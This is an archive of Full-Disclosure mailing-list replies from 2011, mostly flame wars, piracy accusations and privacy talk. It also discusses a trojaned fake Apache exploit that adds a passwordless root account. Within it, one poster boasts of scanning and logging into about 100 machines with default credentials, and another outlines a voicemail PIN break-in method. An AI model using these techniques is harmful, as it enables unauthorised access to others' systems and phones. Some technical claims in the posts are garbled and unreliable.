Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Ok, thats plain scary. I was told of google 'tracking' any popular thread they see in theyre engine or google words so i am assuming that, they have some very strong filters set for FD for things like, taslking about theyre own system of cache in google (yet another little test..). Still rather worrying, as this was only *rumored* before. Now it seems this is for real, and, that would be a massive infringement of human rights in general actually. I am shocked but, then again, understand google control alot of the internet, so it is no wonder but, also abit of a worry if the trend continues so fast as it is. I have already removed the post or rather modified it, and now, will also remove the other page but, i guess people dont realise, all those wapps, are free in ms, and vs6 ok, was my bad for keeping a personal backup, is not linked to one website i have never put them things up for others,and only recent for the website itself. However, the vcredist2005, could work same place as it.. I also renamed it back to how it was, and should have been from the start... wich is simple, how to setup a VS6 setup wich is nice to run with, and wuns fine still with newer versions. All i did was, remove the original authors links, replaced with .rar and .tar and bingo, some ppl just thought 'warez' . Its kinda sad somany sniped at that, or rather, swiped.. when there is cc fraudsters, i would much rather see go down. and much much worse 'hack' sites,or 'bot' sites. i did an experiment, it worked, it was interesting. Now, it is done. thankyou for those who particpted in a good way, it was very interesting to learn alot of this like even this recent google cache thing. I wonder just howmuch we are tracked by google. They are afterall, huge and then, they are also owned by M$. cheers Valdis, xd On 3 October 2011 17:17, valdis.kletni...@vt.edu wrote: On Mon, 03 Oct 2011 12:25:31 +1100, GloW - XD said: sheesh, have they already cached it :s hrm... lol...well, that was VERY fast then, considering i linked to it only a cpl days ago :s from the files, and I have on occasion posted to F-D during an ongoing thread, and then Googled for more info on the thread, and discovered that Google had already have indexed my posting and parked it on the first page of results before I even receive my own copy back from the server. As for your posting: http://www.google.com/search?sourceid=mozclientscoring=die=utf-8oe=utf-8q=%22sheesh%2C+have+they+already+cached+it+%3As+hrm.%22 I see 3 hits already for the string sheesh have they aready cached it as contained in 3 different archives of this list. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
if you allow the small fishes to play, they will grow big. rubbish. Complete rubbish. Thats a very broad spectrum of people here, and while i may not seem whitehat atall, and am no hat really, I try remain neutral, and, that guy, decided to show me he was attacking me aand, accusing, for things i simply have not done, wich, is alot like what you are trying todo. I have been in IT sec for years, and never once committed any kind of fraud.How pathetic would that be, if my own business was to flunk, because of say, cc fraid.. wich, i have personally experinced, and would not wish on my enemies. So pleease take the socialist theories elswhere. PS: In real life, they go after the fishes who make them loose money, not small nor big, it is VICTIM impact. always will be. And until there is firm enough laws, this will not change. Why would they chase me, even, for one pirated iso, not even pirated, a copy of an original i believe. the rest is pure freeware, from ms, i just removed the links purposely, but have them safely tucked here. So, who is silly for assuming that, i am low level at best with piracy not even a pirate, it was a backup, wich i used as experimental material in the end.. Your socialist views, probably show where you are from, or shine through that custms, while we in the real world, tend to belive in the 'law'. ;-) rofl... you make me laff. have a good read party boi. xd On 3 October 2011 18:44, Ferenc Kovacs tyr...@gmail.com wrote: i assume, there is way more credit-fraud and rape etc going on, than wares...or, police having to waste time, on wares... i think police themseves detedst those things, and hence why the clouds still linger over some websites wich should be 'down' yet, are not. it's not working like that, you can't expect that the cops/feds won't chase piracy while there are more serious crimes unresolved. sadly. That, is simply isp not complying with a takedown order wich is, completely up to them. Why would they want to loose good customers/people who bring them even traffic and revenue thru websites. it simply: not worth taking the risk. if you won't comply, you are risking that your whole business can go down the toilet, and if and when you can prove that you are right, you lost your business already. and usually those customers is the minority of your client base, and they are a risk for your own infrastructure also(they can hack/abuse your own servers). I dont promote ads on my one, but i have always maintained a very steady and friendly,helpful with security, to my hosters wich they really appreciated. So, sometimes being in IT pays off... I guess... but what a struggle to get anywhere, even for the harder stuff, and people like n3td34v completely dont see that, yep, we only see what you show on this list, and so far, you didn't really worked on your whitehat image. the whole issue of freedom of speech and, security especially,ie: when i submit a PoC, anything nowdays, could happen.. yeah, the net seems to be more similar than the real life, it's much harder to be truly anonymous nowadays. these are the clouds i really wish to lift, in order though, I first must set some people on this list into the same state of mind, wich is prooving to be alittle harder than i expected. I think the problem is more about how you deliver the message, not the message itself. n3td3v thinks i am personally attacking his whole persona, wich, i should, and could, maybe pentest him and then, see if that is illegal.Ifso then, i would assume my tool of choice3, nmap, would also be in danger ? you brought this (cat)fight to the mailing list, so of course he thinks that you personally attacking him. hehe... see how this can get offtopic, but really it is the same topic of security/vpn and now, i am bringing it to an isp and Noc level... and hopefully, some others will see the things said, and indeed, they know there is a lot more hard crime that could be done by police, wich would benmefit ALL communitys, and people IRL, asin kids, in some cases. see above, you can't expect that lesser crimes are ignored because there are other more serious crimes out there. I also detest the use of the law, for low level crappy crimes when they could be rm -rf'ing REAL dangerous people who actually, are trying to harm others, or simply, out for extortion and no other reason. see above. I can say now safely, i am from .au and, i feel happy we have the laws here for serious crimes, i detested the dd0s kiddy david cecil's 'defacing' and, trying to cryout for work... what a b*m... I simply lookin the paper, and ring. Anyhows, he is in a cell, and for good reason, and, ofc, things with him got more serious because he was defrauding people of money. This is when, things go down, when you durectly steal funds, ie, if i were to steal shares in M$ using a PC, id be considered a cyber-terrorist,and,
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
No not the broken window effect, his outlook about how being s asmall criminal, always becoming a bigger one, is that the same? Oh well.. then... i beg to differ with you but, i dont believe that statement, ifso, then we would have alot more arrests indeed. btw for those thinking there will be any 'fight' with n3td3v , cmon, guys have faith, i was merely introducing myself to him after he rudely, and, i do mean that, rudely and invasively started throwing about, words abit to long for people of that intellect. When his Iq grows, so will my affection for that mailing list again ;-) The broken window effect, seems, broken. or, am i just, thinking, that i am one of a minority here, wich, i doubt if you were to count REAL FRIGGING LIFE YOU MORON. Anyhow have a nice day, you are of the intellect iof a n3td3bv, please join that list for cock-wipphings. have a nice day, sire. xd On 3 October 2011 19:37, Kornél Lugosi coorn...@gmail.com wrote: So pleease take the socialist theories elswhere. Could you elaborate on how the Broken Window effect is a Socialist theory ? Kornel ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Massive Security Vulnerability In HTC Android Devices (EVO 3D, 4G, Thunderbolt, Others) Exposes Phone Numbers, GPS, SMS, Emails Addresses, Much More
No surpise... theyre ext4 partitions are completely vulnerable.. try tell an anddroid user that, tho. Spender 9grsecurity.net0 has exposed the ext4 bug, wich allows remote user addition to, whatever kernel, i assume runs the ext4 right... with some small changes ofc to code... so, it is strange they dont patch, i myself use 1.6 , but, wow this rally blows things for many users.. interesting stuff, and maybe is good thing i use the old 1.6 api.. hehe. seems newer the stuff, more the chances of malicious activity.. i guess NOTW m anagement mustve known this one forsure. thx for that, insightful , and,reminds me more that, a phone nowdays is almost as dangerous as a laptop in your hand. cheers, xd On 3 October 2011 19:30, Di. Tled dit...@parano.me wrote: http://www.androidpolice.com/2011/10/01/massive-security-vulnerability-in-htc-android-devices-evo-3d-4g-thunderbolt-others-exposes-phone-numbers-gps-sms-emails-addresses-much-more/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Agreed, if exposed to this environment, one will retalliate usually, and then, hate authority... Although, I know people of an intellectual nature, could be used and,in society indeed, even if it is community work@ google! ha... 10hrs free unpaid work of fun! I would certainly take the rehab,coming into a normal society, as a contributor, not pest. cheers On 3 October 2011 22:21, Darren Martyn d.martyn.fulldisclos...@gmail.comwrote: Small criminal can become big criminal if put in current prison system. Not always, but a lot will. You put (As example) small hacker in prison with lots of crooks, etc. Crooks see him/her as an asset for future work, and on the putside they become bigger criminal. Max Butler is a fine example of the failings of punitative justice. Also, lol, tag soup it is xD On Mon, Oct 3, 2011 at 9:52 AM, GloW - XD doo...@gmail.com wrote: No not the broken window effect, his outlook about how being s asmall criminal, always becoming a bigger one, is that the same? Oh well.. then... i beg to differ with you but, i dont believe that statement, ifso, then we would have alot more arrests indeed. btw for those thinking there will be any 'fight' with n3td3v , cmon, guys have faith, i was merely introducing myself to him after he rudely, and, i do mean that, rudely and invasively started throwing about, words abit to long for people of that intellect. When his Iq grows, so will my affection for that mailing list again ;-) The broken window effect, seems, broken. or, am i just, thinking, that i am one of a minority here, wich, i doubt if you were to count REAL FRIGGING LIFE YOU MORON. Anyhow have a nice day, you are of the intellect iof a n3td3bv, please join that list for cock-wipphings. have a nice day, sire. xd On 3 October 2011 19:37, Kornél Lugosi coorn...@gmail.com wrote: So pleease take the socialist theories elswhere. Could you elaborate on how the Broken Window effect is a Socialist theory ? Kornel ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Massive Security Vulnerability In HTC Android Devices (EVO 3D, 4G, Thunderbolt, Others) Exposes Phone Numbers, GPS, SMS, Emails Addresses, Much More
haha.. reminds me of old days of pbxs! hang each others voicemail greetings for fun... rofl.. we used to press 1+# and 0+# or 1+* sometimes, always oen fo those combos.. together (produce a sharper tone) but had to be that combo,on old analogues, it would break thru most answering-machines and we could then change for example welcome to the deans residence.. to welcome to hot, sweaty u get the drift :P lol... those days are over for me now but, darn miss analogue! gnite! xde On 3 October 2011 22:24, Darren Martyn d.martyn.fulldisclos...@gmail.comwrote: NOTW Hacking method for phones is nothing to do with this. Voicemail hacking in the UK involves calling the victim, hammering the # button while the phone rings, and being redirected to their voicemail box. Then you just press and # and DONE! (sometimes they have a password, but a 4 digit pass is 10,000 combinations. Most people use easy to remember ones so a simple bit of SE and some simple looking at the phone keypad and BOOM! done!) As kids we used to do this to each other and change each others voicemail greetings for fun... Nothing has changed in the UK and Eire since. IN fact, I will post agian in an hour to confirm - I will break into my own voicemails and check. On Mon, Oct 3, 2011 at 12:17 PM, GloW - XD doo...@gmail.com wrote: No surpise... theyre ext4 partitions are completely vulnerable.. try tell an anddroid user that, tho. Spender 9grsecurity.net0 has exposed the ext4 bug, wich allows remote user addition to, whatever kernel, i assume runs the ext4 right... with some small changes ofc to code... so, it is strange they dont patch, i myself use 1.6 , but, wow this rally blows things for many users.. interesting stuff, and maybe is good thing i use the old 1.6 api.. hehe. seems newer the stuff, more the chances of malicious activity.. i guess NOTW m anagement mustve known this one forsure. thx for that, insightful , and,reminds me more that, a phone nowdays is almost as dangerous as a laptop in your hand. cheers, xd On 3 October 2011 19:30, Di. Tled dit...@parano.me wrote: http://www.androidpolice.com/2011/10/01/massive-security-vulnerability-in-htc-android-devices-evo-3d-4g-thunderbolt-others-exposes-phone-numbers-gps-sms-emails-addresses-much-more/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Wow, i am impressed jacqui, you are VERY very aware of the law,moreso than me! I have not seen that yet..well, not so good!@ I am impressed, because I dont really look at taking out the sites otr, people who claim to be pros etc, and, reaally, i should never had began the thread...altho, i saw he is as *popular* guy.. cheers , your work is brilliant. xd On 4 October 2011 01:57, Jacqui Caren-home jacqui.ca...@ntlworld.comwrote: On 03/10/2011 16:16, Laurelai wrote: that html makes my eyes want to bleed The site is obviously commercial, hence getting the below revoked should be a doddle via a complaint to enom. Registrant: Andrew Wallace Registrant type: UK Individual Registrant's address: The registrant is a non-trading individual who has opted to have their address omitted from the WHOIS service. The above only applies if you are not advertising, selling or trading in any manner. UK and EU law regarding commercial web sites is quite well defined but very rarely enforced by uk plod etc. Its pretty easy to quote AUP, UK and EU Laws against this sort of site to a UK WSP (IIRC google Uk are the WSP). I suspect the site will break the Google AUP somehow - given the lack of business contact details and the use of hidden address details I suspect google would remove the site then ask questions, hence the need to do execute enom/nominet complaint first :-) Jacqui ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Well ok, true that html is more secure. I would rather run html2/3 , well 2 is the norm isnt it.. than php anyday. good point out. cheers, xd On 3 October 2011 23:51, SanguineRose sanguiner...@occultusterra.comwrote: That is awesome. I approve of this 90s HTML code and bring back the good old days! HTML 3.0 is the stuff but that might be HTML 2.0 I don't remember. On Mon, Oct 3, 2011 at 4:39 AM, Jacqui Caren-home jacqui.ca...@ntlworld.com wrote: On 02/10/2011 18:38, Stefan Jon Silverman wrote: oy, list newbie meets n3td3v -- this should be fun Just looked at this site. Shudder. FYI: this is PART of one sentence! This site should be linked to within the wikip definition of tag soup :-) font color=#414B56 size=2 is a professional consu ltancy /fontfontfontfont size=3font size=4fontfontfont size=3font size=4 /font/font/font/font/font/font/font/fontfontfontfont size=3font size=4fontfontfont size=3font size=4 /font/font/font/font/font/font/font/fontfontfontfont size=3font size=4fontfontfont size=3font size=4 /font/font/font/font/font/font/font/font fontfontfont size=3font size=4fontfontfont size=3font size=4 /font/font/font/font/font/font/font/fontfontfontfont size=3font size=4fontfontfont size=3font size=4 /font/font/font/font/font/font/font/fontfontfontfont size=3font size=4fontfontfont size=3font size=4 /font/font/font/font/font/font/font/fontbr / br / font size=3font size=4font size=3font size=2font color=#414B56font s ize=2 offering business services to a wide range of clients within /font/font/font/font /font/fontfontfontfont size=3font size=4fontfontfont size=3font size=4 /font/font/font/font/font/font/font/fontfontfontfont size=3font size=4fontfontfont size=3font size=4 /font/font/font/font/font/font/font/fontfontfontfont size=3font size=4fontfontfont size=3font size=4 /font/font/font/font/font/font/font/fontbr / font size=3font size=4font size=3font size=2font color=#414B56font s ize=2 br / the UK industry./fontbbr / ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
Yes is legit,... however thats a backdoored copy i believe, the actual 'proper' , has a execl() type method... no shellcode, and, no evil ;) On 4 October 2011 01:31, Darren Martyn d.martyn.fulldisclos...@gmail.comwrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
naw naw... really, it workx... pls exec and attack apaches ;') lol. On 4 October 2011 02:02, John Jacobs flamdu...@hotmail.com wrote: http://packetstormsecurity.org/files/25728/w000t-shell.c.html It's a trojan, based on the w00t-shell.c code; the shell code adds a passwordless root account under the name w000t. Date: Mon, 3 Oct 2011 15:31:29 +0100 From: d.martyn.fulldisclos...@gmail.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Apache 2.2.17 exploit? I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Hey Jeff, I am glad there are people here who understand the need for real privacy in the modern age. The US Government has proven *repeatedly* that the more power it has the less trustworthy it is especially when it comes to privacy concerns. This is mainly aimed at Jeffs posting, I think i agree 100%. Thats what this topic is about, hence why, i want answers still, on many levels. cheers for your interest and welcome to a decent discussion about privacy, albeit, those who are trying to ruin things.. it is an area people are always scared to tackle, yet affects the list more than anyone. cheers xd PS: sorry to cc u laurelai but since we are one and same, well... rofl. no seriously, i did not have jeffs email in my emailer, dont know why. tsozz. Thankyou, On 4 October 2011 08:48, Laurelai laure...@oneechan.org wrote: On 10/3/2011 12:37 PM, Jeffrey Walton wrote: On Mon, Oct 3, 2011 at 5:21 PM, Laurelailaure...@oneechan.org wrote: On 10/3/2011 12:16 PM, Ferenc Kovacs wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelailaure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. The idea that if you've done nothing wrong, you have nothing to worry about assumes that the government is full of good people that would not abuse their power, ever. Even if this were true now, we cannot be sure it'll be true in the future and its damn sure not true now. Definetly not true in the past. Confer: Martin Luther King was subjected to tens of thousands of illegal wire taps by the FBI because he (and a lot of other people) felt black folks should get the same rights as white folks. The guy who did it was honored in death, and the bureau he helped shape actually carries fidelity and integrity in their motto. Twisted but true. Jeff I am glad there are people here who understand the need for real privacy in the modern age. The US Government has proven *repeatedly* that the more power it has the less trustworthy it is especially when it comes to privacy concerns. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
The media and such often gloss over the human aspects of an incident. Bang, thats the thing that will get you behind jail, or no jail. The press pushes it on, the people are always then arrested, because the public need*answers* even when they do not understand much of the time what exactly has happened, and wouldnt even if explained it to them.. Tahts the biggest thing affecting it, victims impact and, wether the victims impact is press would help it, but they could just privately fund the arrest if there is the right things in place , ie treatys, and leo etc is involved. Thats kind of irrelevant, and only a small bunch of cases i would assume... but there is much we do not see nor hear about. On 4 October 2011 03:35, Darren Martyn d.martyn.fulldisclos...@gmail.comwrote: *laughs* I wholeheartedly agree, and the fact it is considered a beautiful language shows me that anyone who considers it beautiful in any way shape or form MUST be on fairly heavy doses of LSD... (I myself use Perl quite a bit, as I can understand it and it is relatively easy to use). My comments regarding intoxicants and coding/hacking are a errant thought regarding the fact that sometimes a malicious hacker may well be of impaired judgement (intoxicated) while doing evil work, and often may well feel remorse afterwards. One malicious/blackhat hacker I know of happened to suffer a LOT of personal grief (ruined his personal life for a while and suffered a bit of mental imbalance for a while) as a result of his drinking habits and his obsessiveness with his work. And that was before law enforcement caught up with him. Strangely enough, since LE got involved he has been on the straight and narrow - sober for a while - and getting along with his education, along with fixing his own affairs. We recently discussed how he felt his actions were kind of an endless black hole - he felt he just could not stop, as it was the only thing he could rely on. Remember - even the malicious guys are human too. The media and such often gloss over the human aspects of an incident. Perhaps Christian can cease and desist with his pointless flaming and if he has an issue he can perhaps directly email those of us who offend him rather than clogging the thread with anger? On Mon, Oct 3, 2011 at 6:38 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 8:36 AM, valdis.kletni...@vt.edu wrote: On Mon, 03 Oct 2011 09:11:33 PDT, Laurelai said: I know a guy who codes perl on LSD, writes good code too. To be fair, it's hard to tell if perl code was written with or without the use of LSD. It's certainly a language that shows LSD influence in the design. :) I know right? When i study it it almost feels like im watching a pink floyd video. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
There's only 4 billion IP's to scan if he want to get all out of his trick. Synscan can do a subnet (class b) in ~3 minutes nowdays ;) I would think he would find it. i did a scan on a kit i found, root:barcelona123 , and, got like 100 boxes in 10minutes of scanning, ofc, i looked up the IP range, usually they scan by range and classes, log to file, then log in. It is very fast nowdays, and very effective if done properly... i have seen this only recently become effevive but, it is..and there is plenty of fools who will execute it as-is... that is just, to easy, every box a kid has root on, will opfc try it *just incase that, fd is wrong* ...and i have seen one case already ;p so, it is the easiest way to engineer, *keep this private* or pvt pvt pvt dont leak! khehe.. best trix ever. xd On 4 October 2011 02:29, n...@myproxylists.com wrote: http://packetstormsecurity.org/files/25728/w000t-shell.c.html It's a trojan, based on the w00t-shell.c code; the shell code adds a passwordless root account under the name w000t. Nice try though. I was not aware that this shellcode was freely available but after debugging the same shellcode I noticed that passwordless account. He'll have plenty of work to do while scanning for that SSH account. There's only 4 billion IP's to scan if he want to get all out of his trick. Date: Mon, 3 Oct 2011 15:31:29 +0100 From: d.martyn.fulldisclos...@gmail.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Apache 2.2.17 exploit? I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
laurelai, this guiy is crazier than i first thought, altho i do agree that this whole thread is now abit old and, only a few people are *really* interested in the legal issues wich im trying to break through. I do like how google does theyre security, Id like to hear why they do accept a PoC as what it is.. rather than assume that that person has rooted me, then gave me the exploit... i know that, you dont have to root people to tell them they *could* be rooted... Anyhow, thats just the actual *topic* and some thoughts ihave, as I see google has awesome practice and payouts for theyre stuff, and it seems to keep them as secure as one could be, being a co theyre size. Asfor this crudd about me being Laurelai, no, and i dont and, never will be. Go do some homework dude.. you have stuff wrong. On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Antony (u stufid mofo) ; Dude has things VERY wrong, I know Laurelai sure, but no way am her. Sorry on that one, your VER wrong. It does not take a genius to see that, there is NO links atall, and infact many things wich have seen us in past arguing/fighting, and only recently have spoken. So, coild you please stfu and, try to do some homework b4 opening the trap idi0t. xd On 4 October 2011 07:35, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
hehe very true but.. I know the author of the OpenSSH-fake, he actually is in my channel daily well, is an operator in there...he made this completely out of hate for that same place he greets hackforums., he did not try hide it much either but he did not gather any boxes off it he just wanted it to look like a hf release..and then make ppl hate that site. He does not use that nickname nowdays, and i wont disclose his new one, but anyone could enter my chan and ask :) ala rawsockets, true, most backdoors need that, for some kinda nastiness ;) xd On 4 October 2011 02:51, Dan Dart dand...@googlemail.com wrote: You need to be root to use raw sockets :( Translation: I shall destroy you. Mwahahaha. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Interesting please elaborate Andrew. i ant to see your views on this, and no, no puns, no hatred, purely, why is FD in *crap* if, they are using that tag of Hosted by Secunia... YOUR own reasons and, what you would define as leaving Your idea leaves grok.org.uk in a bad position Hosted and sponsored by Secunia Basically, saying that groks would be able to be simply removed, as such.. am i right ? So, i am seeing more crappage, or, just explain... please. xd On 4 October 2011 02:46, andrew.wallace andrew.wall...@rocketmail.comwrote: On Mon, Oct 3, 2011 at 3:57 PM, Jacqui Caren-home jacqui.ca...@ntlworld.com wrote: The site is obviously commercial, hence getting the below revoked should be a doddle via a complaint to enom. Registrant: Andrew Wallace Registrant type: UK Individual Registrant's address: The registrant is a non-trading individual who has opted to have their address omitted from the WHOIS service. The above only applies if you are not advertising, selling or trading in any manner. UK and EU law regarding commercial web sites is quite well defined but very rarely enforced by uk plod etc. Its pretty easy to quote AUP, UK and EU Laws against this sort of site to a UK WSP (IIRC google Uk are the WSP). I suspect the site will break the Google AUP somehow - given the lack of business contact details and the use of hidden address details I suspect google would remove the site then ask questions, hence the need to do execute enom/nominet complaint first :-) Jacqui ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Your idea leaves grok.org.uk in a bad position Hosted and sponsored by Secunia n3td3v - Security Solutions is not a registered company. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Yes, it is nice ay :) When M$ asks me to remove it, I shall. cheers. xd On 3 October 2011 06:50, SanguineRose sanguiner...@occultusterra.comwrote: This is rather fascinating, http://crazycoders.com/sdk/tut.htm . Your grand tutorial on building/making botnets aye? I rather like the pirated version of VC 6.0 Pro. You do seem to have a fine assortment of pirated software in that directory and I do believe it is rather illegal to distribute Microsoft Products like that. ~ Index of /sdk Parent Directory PPCPACK-Sp5.rar SDK.rar VS6.SP5-FOR.VS6PRO.rar VS6PRO.rar ddk_xp.rar feb2003SDK.iso.tar.gz images/ setting.css tut.htm vcpp5.exe win2kddk.exe windows_server_2003_sp1_ddk.iso Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at crazycoders.com Port 80 ~ You, sir, are very pro at what you do. I rather like the Windows Server 2003 SP1 CD though. I'm not sure if Psychz Networks http://www.psychz.net/ would enjoy such piracy. Have a good day sir ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
ok... so it will be seized :P xd On 3 October 2011 09:44, andrew.wallace andrew.wall...@rocketmail.comwrote: On Sun, Oct 2, 2011 at 11:25 PM, GloW - XD doo...@gmail.com wrote: Yes, it is nice ay :) When M$ asks me to remove it, I shall. cheers. xd It doesn't work that way, your domain will be seized by DHS-ICE. http://www.ice.gov/about/offices/homeland-security-investigations/ Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
